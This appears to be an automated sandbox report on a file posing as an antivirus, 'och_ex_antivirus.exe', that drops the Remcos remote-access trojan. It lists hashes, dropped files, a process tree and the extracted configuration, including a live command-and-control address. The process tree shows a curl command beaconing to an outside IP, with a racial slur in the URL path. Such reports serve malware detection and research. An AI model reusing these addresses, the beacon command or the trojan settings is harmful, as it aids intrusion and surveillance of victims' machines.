Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    22-04-2024 11:57

General

  • Target

    och_ex_antivirus.exe

  • Size

    17.0MB

  • MD5

    eb33ab953cc1efc9a57c6c9db447a587

  • SHA1

    e5657e79caa5722ac87a0b933f9a22d4b4844f71

  • SHA256

    042767e0fa4fa7fe964a771a9d743ebb740d4f9a1e59609c704f51958310b1ff

  • SHA512

    69b6ed09d38a85bef70ff52e7833d060163c0b6bddd271d81f801a99513da2985d5d25dcb971b57b00504053b93068e5921142abb13ed05c33e1e1d5c4841c78

  • SSDEEP

    196608:C0bq45mXYPrOLaw1ZiRaKUhi9TQvtzEXPg7V8/TLZ5:/bq4oojOLahUhi9z/PTLr

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

178.33.57.155:443

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-PM1AI7

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 14 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe
    "C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe"
    1⤵
    • Checks whether UAC is enabled
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2860
    • C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe
      C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Modifies Internet Explorer settings
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2596
      • C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe
        C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Modifies Internet Explorer settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2748
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\SysWOW64\cmd.exe
          4⤵
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:2508
          • C:\Windows\SysWOW64\explorer.exe
            C:\Windows\SysWOW64\explorer.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1644
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\check1.vbs"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2096
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c curl http://94.156.66.107:9000/hooks/nigger?id=QGTQZTRE
                7⤵
                  PID:2316
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\chthemyndekf.vbs"
                6⤵
                  PID:1316

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\a4d0d0ec

        Filesize

        5.4MB

        MD5

        47842103e2e4b1f02de9a4dea3b65dcc

        SHA1

        11bb3c3c1ad4f6b4fc7769ecf14b4f9e5ede5dda

        SHA256

        0cb81803e081f6491491f74f857d6e738307ede06bd3e9e39f4b5f44c0bd2548

        SHA512

        18d986698df11ad9032fa0fc90417f0f6b411158c73d93824ec6030908b5d1f5ddbcd4628f7fcab5b8bf04e559ac39b6a85c24449cb126c0b26a9bb24d77b322

      • C:\Users\Admin\AppData\Local\Temp\afc00fbd

        Filesize

        1.2MB

        MD5

        a44564c5624447597ad73d1a4ad63375

        SHA1

        229b2fa4ced130aa45395760b1b16b3bd0363ac7

        SHA256

        e398903e8fdce879747ec96c118306a0e9c1d5aaf41ac79e2c1142b961051bb8

        SHA512

        e0fd05cbc7a17f58358214950d05163b03008d147c68f31c1db9ff055527d82136e023dab745a7b41abe1ddcbb39ff7c66ed6fe4c4539e6a18d8c75de99f3c8a

      • C:\Users\Admin\AppData\Local\Temp\check1.vbs

        Filesize

        146B

        MD5

        85a2ebad40c21ba1da77230265b5351f

        SHA1

        803822e08837ebda5de7dde963e4872ae2fc4c21

        SHA256

        b5c409cbb25690b000d9d36c3b5170c1e61fff3d89bdaeadf0166ae28b0fdff9

        SHA512

        77374eb3d9632c45c25c997380eab1ee338fbe659a24679b3cf28e76d67ffa71e2d2ea326181909d06970dca0e92b5528c1e7f9c866493162fd77170f87ea83a

      • C:\Users\Admin\AppData\Local\Temp\chthemyndekf.vbs

        Filesize

        260B

        MD5

        20194639a471c85332924601e071aec4

        SHA1

        6a69ca7f78b34ca6a3959236237ef62de1cf09a2

        SHA256

        43dddf81fa819e8499eb4a24211a2702ee8a3fc04048d4a8e3b3f4f9420c68e8

        SHA512

        5616837814bf251f1d007cbaf8002aa66b91b199833437ca236507adaa40ece785264da6857445ab8ae958803453af67f631a0ec0cd1c931c7f3e763c24bc079

      • C:\Users\Admin\AppData\Local\Temp\toolsync\MSVCP140.dll

        Filesize

        427KB

        MD5

        71a0aa2d05e9174cefd568347bd9c70f

        SHA1

        cb9247a0fa59e47f72df7d1752424b33a903bbb2

        SHA256

        fdb3d86c512adff90967cb860d02a4682850ab96727f0376e4d4836504c50e47

        SHA512

        6e65520528facaa4058720eb16d6bfdcc7bb36923b7e8e6551f3526709f0fabafab123999e618438e6abe7efed4a1332547cfc988f2b24b0e3d91198b95a911a

      • C:\Users\Admin\AppData\Local\Temp\toolsync\VCRUNTIME140.dll

        Filesize

        81KB

        MD5

        16b26bc43943531d7d7e379632ed4e63

        SHA1

        565287de39649e59e653a3612478c2186096d70a

        SHA256

        346f72c9a7584c2ab6ce65cd38a616c77ebddc0bbab2274c4e89dd5e62237517

        SHA512

        b5b7b4b8c5ab4276a34956e43f586272b1803ec3609253fee1bcc0a549aed7ba11d47404b023f7b67af701726bab95cca55738e7bd5bca272eca5ac71bb418cc

      • C:\Users\Admin\AppData\Local\Temp\toolsync\WCLDll.dll

        Filesize

        590KB

        MD5

        b3e030ab715a02f8864a79f552a247b7

        SHA1

        4b1c18370b6e8a69c5f8b3ff543375f74e6e58fa

        SHA256

        2a844750786ab6798e9a26de7f080802f709c0f12ba7a31545f0c2e449ac0955

        SHA512

        cd030a0a9e6109b27b5f5d3299024c222287487bc9fac1edd92b760425a939bc307b1d15801fec7e274bd8377b8dd9c7883674d1488af5f062a102275a373eda

      • C:\Users\Admin\AppData\Local\Temp\toolsync\audiovisual.psd

        Filesize

        1.0MB

        MD5

        a0a180d2677f494049d7a55c888fed93

        SHA1

        d09358fddc9a67ae55b5ba4a34fba04357b528db

        SHA256

        5e086150a36e2e98c91464a210499648832172f883c1bd515c4a0661a10866bd

        SHA512

        1f152fe593a25c05973b351206a40953bd801b8c77f04c2f20c966869fe72d2b6c71ed5bd77e64942153f0dca590e2655340a93d8b7eb29d558152f1a7b6fde1

      • C:\Users\Admin\AppData\Local\Temp\toolsync\cyclopedia.html

        Filesize

        28KB

        MD5

        db3f3969e8a2f913fe3643d8465171b1

        SHA1

        736095ea1e02547a6df2586fffdbf31bb7d23656

        SHA256

        c207be09bf97912ed1271a4186bb626edc530c76f3e5edcac883a98946c41043

        SHA512

        0a2948bad6e3f6338fb44a727e0de4d268db6a6e5933331b54b12877da0f3b75a796cb32e86cd251b4afc4ca9df5aaccb04db1153b31fc77318ce8909b18d81b

      • C:\Users\Admin\AppData\Local\Temp\toolsync\ptMgr.dll

        Filesize

        2.5MB

        MD5

        2087eb2d3fb639933ebe0a0614fd5218

        SHA1

        c1a1b75c8e76e000b7045092bd11100904a72840

        SHA256

        725f50650cb9490027b633a1ff0ae166cb6fc42037dbe72d9a09dd65be323a1f

        SHA512

        3390536ed543529d01ed7d1616d36d6fde67d68bf6641f901ac5c081ede043943dacd3a7a0bf1729945be800d4ccda00c07511e1c23c7c33d9864be50645502e

      • C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe

        Filesize

        202KB

        MD5

        64179e64675e822559cac6652298bdfc

        SHA1

        cceed3b2441146762512918af7bf7f89fb055583

        SHA256

        c26db97858c427d92e393396f7cb7f9e7ed8f9ce616adcc123d0ec6b055b99c9

        SHA512

        ef740b35ea5190f8ee47776af1f15ebdd54d39c84da5665e64f67ae6dd0f4b181e955e9a35319a5d0bd764972562e8f2bc44dbdf83c3bedf05674eae902e7280

      • C:\Users\Admin\AppData\Local\Temp\toolsync\ptusredt.dll

        Filesize

        165KB

        MD5

        3c3e960d59cb413791fee1e944b6df72

        SHA1

        4aa6c90d81692642ca8266bf0d8e249ff3e3ad54

        SHA256

        88378c228d7827974fe6ec827837af7571290e129082e7070d4bff7a42f4ba67

        SHA512

        85b471aa2a066c6a779384ed102b895af108af51cd718bb834cda107f71bf5e6fcd8ecc77e9ea4fd7fd3ddbc10b1f57870a9bafcbbfa1be8e2ba224651d77aac

      • C:\Users\Admin\AppData\Local\Temp\toolsync\wbxtrace.dll

        Filesize

        103KB

        MD5

        c2b06a78b6c07a1371b6aed1dbf4fc37

        SHA1

        b8847693e7cd3637b1b400e71430cdf629de2e64

        SHA256

        9e2b2d67d0e70651a64a3febee9f2698d8a939633587fe973a30758368cffc04

        SHA512

        219965e4b3e9f237f75d9306bdf5a08c872cded973009da64c58221e1bbdbfda35e4861c4c0b6687fca7c67ef496b307695af5e1270f8d5c3cf71a3fc02c6411

      • memory/1644-135-0x0000000077620000-0x00000000777C9000-memory.dmp

        Filesize

        1.7MB

      • memory/1644-136-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

      • memory/1644-152-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

      • memory/1644-148-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

      • memory/1644-147-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

      • memory/1644-146-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

      • memory/1644-145-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

      • memory/1644-144-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

      • memory/1644-138-0x0000000000C50000-0x0000000000ED1000-memory.dmp

        Filesize

        2.5MB

      • memory/2508-84-0x0000000077620000-0x00000000777C9000-memory.dmp

        Filesize

        1.7MB

      • memory/2508-82-0x0000000074510000-0x0000000074684000-memory.dmp

        Filesize

        1.5MB

      • memory/2508-131-0x0000000074510000-0x0000000074684000-memory.dmp

        Filesize

        1.5MB

      • memory/2508-132-0x0000000074510000-0x0000000074684000-memory.dmp

        Filesize

        1.5MB

      • memory/2508-134-0x0000000074510000-0x0000000074684000-memory.dmp

        Filesize

        1.5MB

      • memory/2596-46-0x0000000077620000-0x00000000777C9000-memory.dmp

        Filesize

        1.7MB

      • memory/2596-45-0x00000000741E0000-0x0000000074354000-memory.dmp

        Filesize

        1.5MB

      • memory/2596-41-0x00000000002F0000-0x00000000002F1000-memory.dmp

        Filesize

        4KB

      • memory/2748-76-0x0000000074510000-0x0000000074684000-memory.dmp

        Filesize

        1.5MB

      • memory/2748-78-0x0000000074510000-0x0000000074684000-memory.dmp

        Filesize

        1.5MB

      • memory/2748-77-0x0000000077620000-0x00000000777C9000-memory.dmp

        Filesize

        1.7MB

      • memory/2748-80-0x0000000074510000-0x0000000074684000-memory.dmp

        Filesize

        1.5MB

      • memory/2748-72-0x0000000000120000-0x0000000000121000-memory.dmp

        Filesize

        4KB

      • memory/2860-79-0x000007FEF6D30000-0x000007FEF6E88000-memory.dmp

        Filesize

        1.3MB

      • memory/2860-8-0x000007FEF6D30000-0x000007FEF6E88000-memory.dmp

        Filesize

        1.3MB

      • memory/2860-0-0x0000000100000000-0x0000000101123000-memory.dmp

        Filesize

        17.1MB

      • memory/2860-15-0x000007FEF6D30000-0x000007FEF6E88000-memory.dmp

        Filesize

        1.3MB

      • memory/2860-30-0x000007FEF6D30000-0x000007FEF6E88000-memory.dmp

        Filesize

        1.3MB

      • memory/2860-6-0x000007FEF6D30000-0x000007FEF6E88000-memory.dmp

        Filesize

        1.3MB